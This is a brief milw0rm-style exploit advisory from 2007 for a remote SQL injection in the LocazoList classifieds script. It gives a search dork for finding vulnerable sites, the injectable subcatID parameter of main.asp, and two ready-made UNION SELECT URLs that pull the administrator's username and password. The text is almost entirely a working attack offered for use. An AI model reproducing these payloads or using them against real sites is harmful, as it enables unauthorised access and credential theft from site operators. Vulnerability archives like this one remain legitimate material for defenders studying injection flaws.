*************************************************************************************
# Title : LocazoList <= v2.01a beta5 (subcatID) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.locazo.net:81
# Dork : "Powered by Locazolist Copyright © 2006"
# $$ : $100
*************************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//main.asp?catid=1&subcatID=[SQL]
Example:
//main.asp?catid=1&subcatID=-1%20union%20select%200,username,0,0,0%20from%20admin%20where%20id%20like%201
//main.asp?catid=1&subcatID=-1%20union%20select%200,password,0,0,0%20from%20admin%20where%20id%20like%201
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-03]